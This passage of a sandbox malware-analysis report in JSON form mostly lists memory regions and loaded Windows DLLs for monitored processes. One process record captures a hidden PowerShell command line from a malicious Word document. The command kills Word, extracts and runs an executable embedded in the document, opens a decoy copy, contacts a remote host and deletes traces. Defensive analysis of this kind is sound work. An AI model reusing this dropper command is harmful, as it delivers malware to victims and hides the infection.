[ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_213", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 50790400, "type": "region", "version": 1 }, "end_va": 50855935, "entry_point": 0, "filename": null, "id": "region_1345", "name": "private_0x0000000003070000", "norm_filename": null, "region_type": "private_memory", "start_va": 50790400, "timestamp": "00:01:07.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001346-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_214", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_1346", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:07.743", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001347-addr_0x0000000000620000-size_0x0000000000040000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_215", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 6684671, "entry_point": 0, "filename": null, "id": "region_1347", "name": "private_0x0000000000620000", "norm_filename": null, "region_type": "private_memory", "start_va": 6422528, "timestamp": "00:01:07.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 51314688, "type": "region", "version": 1 }, "end_va": 52363263, "entry_point": 0, "filename": null, "id": "region_1348", "name": "private_0x00000000030f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 51314688, "timestamp": "00:01:07.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 2006712320, "type": "region", "version": 1 }, "end_va": 2006724607, "entry_point": 2006712320, "filename": "\\Windows\\System32\\normaliz.dll", "id": "region_1349", "name": "normaliz.dll", "norm_filename": "c:\\windows\\system32\\normaliz.dll", "region_type": "memory_mapped_file", "start_va": 2006712320, "timestamp": "00:01:07.775", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 475136, "start_va": 8791636967424, "type": "region", "version": 1 }, "end_va": 8791637442559, "entry_point": 8791636993776, "filename": "\\Windows\\System32\\netprofm.dll", "id": "region_1350", "name": "netprofm.dll", "norm_filename": "c:\\windows\\system32\\netprofm.dll", "region_type": "memory_mapped_file", "start_va": 8791636967424, "timestamp": "00:01:07.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791741300736, "type": "region", "version": 1 }, "end_va": 8791741329407, "entry_point": 8791741306032, "filename": "\\Windows\\System32\\WSHTCPIP.DLL", "id": "region_1351", "name": "wshtcpip.dll", "norm_filename": "c:\\windows\\system32\\wshtcpip.dll", "region_type": "memory_mapped_file", "start_va": 8791741300736, "timestamp": "00:01:07.778", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 348160, "start_va": 8791747592192, "type": "region", "version": 1 }, "end_va": 8791747940351, "entry_point": 8791747596372, "filename": "\\Windows\\System32\\mswsock.dll", "id": "region_1352", "name": "mswsock.dll", "norm_filename": "c:\\windows\\system32\\mswsock.dll", "region_type": "memory_mapped_file", "start_va": 8791747592192, "timestamp": "00:01:07.779", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001353-addr_0x000007fffffac000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_216", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092678144, "type": "region", "version": 1 }, "end_va": 8796092686335, "entry_point": 0, "filename": null, "id": "region_1353", "name": "private_0x000007fffffac000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092678144, "timestamp": "00:01:07.779", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001354-addr_0x0000000003340000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 53739520, "type": "region", "version": 1 }, "end_va": 54788095, "entry_point": 0, "filename": null, "id": "region_1354", "name": "private_0x0000000003340000", "norm_filename": null, "region_type": "private_memory", "start_va": 53739520, "timestamp": "00:01:07.789", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001355-addr_0x000007fffffaa000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_218", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092669952, "type": "region", "version": 1 }, "end_va": 8796092678143, "entry_point": 0, "filename": null, "id": "region_1355", "name": "private_0x000007fffffaa000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092669952, "timestamp": "00:01:07.789", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791581261824, "type": "region", "version": 1 }, "end_va": 8791581319167, "entry_point": 8791581266032, "filename": "\\Windows\\System32\\msimtf.dll", "id": "region_1356", "name": "msimtf.dll", "norm_filename": "c:\\windows\\system32\\msimtf.dll", "region_type": "memory_mapped_file", "start_va": 8791581261824, "timestamp": "00:01:07.792", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001359-addr_0x0000000002a80000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_219", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 44564480, "type": "region", "version": 1 }, "end_va": 45613055, "entry_point": 0, "filename": null, "id": "region_1359", "name": "private_0x0000000002a80000", "norm_filename": null, "region_type": "private_memory", "start_va": 44564480, "timestamp": "00:01:07.822", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001360-addr_0x0000000002be0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_220", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 46006272, "type": "region", "version": 1 }, "end_va": 46071807, "entry_point": 0, "filename": null, "id": "region_1360", "name": "private_0x0000000002be0000", "norm_filename": null, "region_type": "private_memory", "start_va": 46006272, "timestamp": "00:01:07.822", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 344064, "start_va": 8791566254080, "type": "region", "version": 1 }, "end_va": 8791566598143, "entry_point": 8791566258252, "filename": "\\Windows\\System32\\oleacc.dll", "id": "region_1361", "name": "oleacc.dll", "norm_filename": "c:\\windows\\system32\\oleacc.dll", "region_type": "memory_mapped_file", "start_va": 8791566254080, "timestamp": "00:01:07.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 6684672, "type": "region", "version": 1 }, "end_va": 6688767, "entry_point": 6684672, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1362", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 6684672, "timestamp": "00:01:07.825", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1363", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:07.871", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1364", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 81920, "start_va": 8791755259904, "type": "region", "version": 1 }, "end_va": 8791755341823, "entry_point": 8791755264224, "filename": "\\Windows\\System32\\RpcRtRemote.dll", "id": "region_1365", "name": "rpcrtremote.dll", "norm_filename": "c:\\windows\\system32\\rpcrtremote.dll", "region_type": "memory_mapped_file", "start_va": 8791755259904, "timestamp": "00:01:07.872", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 52625408, "type": "region", "version": 1 }, "end_va": 53673983, "entry_point": 0, "filename": null, "id": "region_1366", "name": "private_0x0000000003230000", "norm_filename": null, "region_type": "private_memory", "start_va": 52625408, "timestamp": "00:01:07.876", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001367-addr_0x000007fffffa8000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_221", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092661760, "type": "region", "version": 1 }, "end_va": 8796092669951, "entry_point": 0, "filename": null, "id": "region_1367", "name": "private_0x000007fffffa8000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092661760, "timestamp": "00:01:07.876", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 593920, "start_va": 8791754342400, "type": "region", "version": 1 }, "end_va": 8791754936319, "entry_point": 8791754347584, "filename": "\\Windows\\System32\\sxs.dll", "id": "region_1368", "name": "sxs.dll", "norm_filename": "c:\\windows\\system32\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 8791754342400, "timestamp": "00:01:07.878", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 6754303, "entry_point": 0, "filename": null, "id": "region_1369", "name": "pagefile_0x0000000000670000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6750208, "timestamp": "00:01:07.881", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12283904, "start_va": 8791566647296, "type": "region", "version": 1 }, "end_va": 8791578931199, "entry_point": 8791566654424, "filename": "\\Windows\\System32\\ieframe.dll", "id": "region_1372", "name": "ieframe.dll", "norm_filename": "c:\\windows\\system32\\ieframe.dll", "region_type": "memory_mapped_file", "start_va": 8791566647296, "timestamp": "00:01:07.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6750208, "type": "region", "version": 1 }, "end_va": 6758399, "entry_point": 0, "filename": null, "id": "region_1373", "name": "pagefile_0x0000000000670000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6750208, "timestamp": "00:01:07.891", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 54788096, "type": "region", "version": 1 }, "end_va": 58929151, "entry_point": 0, "filename": null, "id": "region_1374", "name": "pagefile_0x0000000003440000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 54788096, "timestamp": "00:01:07.894", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791592992768, "type": "region", "version": 1 }, "end_va": 8791593041919, "entry_point": 8791593017388, "filename": "\\Windows\\System32\\npmproxy.dll", "id": "region_1438", "name": "npmproxy.dll", "norm_filename": "c:\\windows\\system32\\npmproxy.dll", "region_type": "memory_mapped_file", "start_va": 8791592992768, "timestamp": "00:01:08.053", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791713710080, "type": "region", "version": 1 }, "end_va": 8791713755135, "entry_point": 8791713714912, "filename": "\\Windows\\System32\\winrnr.dll", "id": "region_1439", "name": "winrnr.dll", "norm_filename": "c:\\windows\\system32\\winrnr.dll", "region_type": "memory_mapped_file", "start_va": 8791713710080, "timestamp": "00:01:08.054", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 8791713775616, "type": "region", "version": 1 }, "end_va": 8791713878015, "entry_point": 8791713781628, "filename": "\\Windows\\System32\\pnrpnsp.dll", "id": "region_1440", "name": "pnrpnsp.dll", "norm_filename": "c:\\windows\\system32\\pnrpnsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713775616, "timestamp": "00:01:08.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791713906688, "type": "region", "version": 1 }, "end_va": 8791713992703, "entry_point": 8791713911456, "filename": "\\Windows\\System32\\NapiNSP.dll", "id": "region_1441", "name": "napinsp.dll", "norm_filename": "c:\\windows\\system32\\napinsp.dll", "region_type": "memory_mapped_file", "start_va": 8791713906688, "timestamp": "00:01:08.055", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 8791747526656, "type": "region", "version": 1 }, "end_va": 8791747555327, "entry_point": 8791747531820, "filename": "\\Windows\\System32\\wship6.dll", "id": "region_1442", "name": "wship6.dll", "norm_filename": "c:\\windows\\system32\\wship6.dll", "region_type": "memory_mapped_file", "start_va": 8791747526656, "timestamp": "00:01:08.056", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 630784, "start_va": 8791265509376, "type": "region", "version": 1 }, "end_va": 8791266140159, "entry_point": 8791265567160, "filename": "\\Windows\\System32\\vbscript.dll", "id": "region_1443", "name": "vbscript.dll", "norm_filename": "c:\\windows\\system32\\vbscript.dll", "region_type": "memory_mapped_file", "start_va": 8791265509376, "timestamp": "00:01:08.060", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 163840, "start_va": 8791347822592, "type": "region", "version": 1 }, "end_va": 8791347986431, "entry_point": 8791347826800, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_1444", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 8791347822592, "timestamp": "00:01:08.079", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791688151040, "type": "region", "version": 1 }, "end_va": 8791688249343, "entry_point": 8791688155152, "filename": "\\Windows\\System32\\mpr.dll", "id": "region_1445", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 8791688151040, "timestamp": "00:01:08.081", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 212992, "start_va": 8791268327424, "type": "region", "version": 1 }, "end_va": 8791268540415, "entry_point": 8791268331620, "filename": "\\Windows\\System32\\scrrun.dll", "id": "region_1446", "name": "scrrun.dll", "norm_filename": "c:\\windows\\system32\\scrrun.dll", "region_type": "memory_mapped_file", "start_va": 8791268327424, "timestamp": "00:01:08.082", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 81920, "start_va": 6815744, "type": "region", "version": 1 }, "end_va": 6897663, "entry_point": 6819952, "filename": "\\Windows\\System32\\wshom.ocx", "id": "region_1447", "name": "wshom.ocx", "norm_filename": "c:\\windows\\system32\\wshom.ocx", "region_type": "memory_mapped_file", "start_va": 6815744, "timestamp": "00:01:08.087", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 6946816, "type": "region", "version": 1 }, "end_va": 6955007, "entry_point": 0, "filename": null, "id": "region_1766", "name": "pagefile_0x00000000006a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6946816, "timestamp": "00:01:15.218", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001774-addr_0x0000000003960000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_327", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 60162048, "type": "region", "version": 1 }, "end_va": 61210623, "entry_point": 0, "filename": null, "id": "region_1774", "name": "private_0x0000000003960000", "norm_filename": null, "region_type": "private_memory", "start_va": 60162048, "timestamp": "00:01:15.222", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001775-addr_0x0000000003b20000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_328", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 61997056, "type": "region", "version": 1 }, "end_va": 62521343, "entry_point": 0, "filename": null, "id": "region_1775", "name": "private_0x0000000003b20000", "norm_filename": null, "region_type": "private_memory", "start_va": 61997056, "timestamp": "00:01:15.222", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001782-addr_0x000007fffffa6000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_329", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092653568, "type": "region", "version": 1 }, "end_va": 8796092661759, "entry_point": 0, "filename": null, "id": "region_1782", "name": "private_0x000007fffffa6000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092653568, "timestamp": "00:01:15.226", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\SYSteM32\\windowspOweRSHeLL\\V1.0\\PoWErSHELL.Exe\" -WindowStyle Hidden Try{$ada=\"\"\"$env:APPDATA\\result.exe\"\"\";$adax=$ada+'x';$f=[System.IO.File]::Create($adax);$tmf=\"\"\"$env:TEMP\\o.tmp\"\"\";taskkill /f /im winword.exe;Function pr{Try{$k=\"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\\StartupItems\\\"\"\";for ($i = 0; $i -lt 10; $i++){$r=[System.Text.Encoding]::Unicode.GetString((gp $k).((gi $k).Property[$i]));if ($r.Contains('.doc')){$i=10;}}$r=$r.Substring($r.indexOf(':\\')-1);$r=$r.Substring(0, $r.IndexOf('.doc')+4);ri -Path \"\"\"HKCU:\\Software\\Microsoft\\Office\\$wv\\Word\\Resiliency\"\"\" -recurse;cp -Path $r -Destination $tmf;$d = (gc $tmf -ReadCount 0 -encoding byte)[985480..1011591];Start-Sleep -s 1;sc $r -encoding byte -Value $d;start winword \"\"\"$r\"\"\";$f = (gc $tmf -ReadCount 0 -encoding byte)[420737..985472];sc $ada -encoding byte -Value $f;& $ada;$wc = New-Object system.Net.WebClient;$ht=$wc.downloadString('http://www.samyrai777m.p-host.in/t/t.php?act=hit');$cd=(Resolve-Path .\\).Path;ri \"\"\"$cd\\*\"\"\" -include http*.pdb, http*.dll, *.cs;}Catch{}};$wv='12.0';pr;$wv='14.0';pr;$wv='15.0';pr;$wv='16.0';pr;Stop-Process -processname powershell;}Catch{exit;}", "filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "id": "proc_8", "image_name": "powershell.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 5, "ref_parent_process": { "ref_id": "proc_5", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00001303-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_195", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1303", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:07.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1304", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:07.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1305", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:07.629", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001306-addr_0x0000000000090000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_196", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 1114111, "entry_point": 0, "filename": null, "id": "region_1306", "name": "private_0x0000000000090000", "norm_filename": null, "region_type": "private_memory", "start_va": 589824, "timestamp": "00:01:07.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1307", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:07.630", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1308", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:07.631", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001309-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_197", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1309", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:07.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 487424, "start_va": 5358419968, "type": "region", "version": 1 }, "end_va": 5358907391, "entry_point": 5358419968, "filename": "\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "id": "region_1310", "name": "powershell.exe", "norm_filename": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "region_type": "memory_mapped_file", "start_va": 5358419968, "timestamp": "00:01:07.631", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1311", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:07.648", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, "filename": null, "id": "region_1312", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:07.650", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001313-addr_0x000007fffffdd000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_198", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092878848, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1313", "name": "private_0x000007fffffdd000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092878848, "timestamp": "00:01:07.650", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000008-region_00001314-addr_0x000007fffffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_199", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 8796092887040, "type": "region", "version": 1 }, "end_va": 8796092891135, "entry_point": 0, "filename": null, 